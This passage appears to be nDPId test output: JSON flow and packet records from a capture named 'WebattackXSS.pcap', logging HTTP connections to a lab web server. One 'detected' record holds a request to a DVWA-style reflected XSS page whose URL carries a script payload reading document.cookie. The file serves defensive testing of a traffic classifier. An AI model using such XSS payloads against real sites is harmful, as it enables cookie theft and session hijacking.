-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347805119,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347805119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZmVAAD4GX2usEAABwKgKMoBuAFBq0H\/ZAAAAAKACchDYowAAAgQFtAQCCAoBPBm8AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":2,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgG5Z9D1oatB\/2qAScSBTDwAAAgQFtAQCCAoD5esxATwZvAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":3,"flow_last_seen":1499347805120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347805120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZmZAAD4GX3KsEAABwKgKMoBuAFBq0H\/aWfQ9aYAQAOXyFgAAAQEICgE8GbwD5esx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347806390,"flow_last_seen":1499347806390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347806390,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1499347806390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AxtAAD4GwrWsEAABwKgKMoB8AFC+iBnhAAAAAKACchDplwAAAgQFtAQCCAoBPBr6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":2,"flow_last_seen":1499347806390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgHy7zo2dvogZ4qAScSCwtQAAAgQFtAQCCAoD5exvATwa+gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":3,"flow_last_seen":1499347806391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347806391,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AxxAAD4GwrysEAABwKgKMoB8AFC+iBniu86NnoAQAOVPvQAAAQEICgE8GvoD5exv"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347807664,"flow_last_seen":1499347807664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347807664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1499347807664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PG1AAD4GiWOsEAABwKgKMoCKAFAzSiBUAAAAAKACchBtFgAAAgQFtAQCCAoBPBw5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":2,"flow_last_seen":1499347807664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgIqXGWCRM0ogVaAScSCEtwAAAgQFtAQCCAoD5e2tATwcOQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":3,"flow_last_seen":1499347807665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347807665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PG5AAD4GiWqsEAABwKgKMoCKAFAzSiBVlxlgkoAQAOUjvwAAAQEICgE8HDkD5e2t"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347810243,"flow_last_seen":1499347810243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347810243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1499347810243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+YpAAD4GzEWsEAABwKgKMoCkAFCAVuc3AAAAAKACchBWiAAAAgQFtAQCCAoBPB69AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7016,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":2,"flow_last_seen":1499347810243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgKT1xLjSgFbnOKAScSC0twAAAgQFtAQCCAoD5fAyATwevQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":3,"flow_last_seen":1499347810244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347810244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+YtAAD4GzEysEAABwKgKMoCkAFCAVuc49cS404AQAOVTvgAAAQEICgE8Hr4D5fAy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347811525,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347811525,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":3,"flow_last_seen":1499347812798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347812798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Yt1AAD4GYvusEAABwKgKMoDAAFAQTEPhWyVuOoAQAOVHQQAAAQEICgE8ITwD5fKw"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 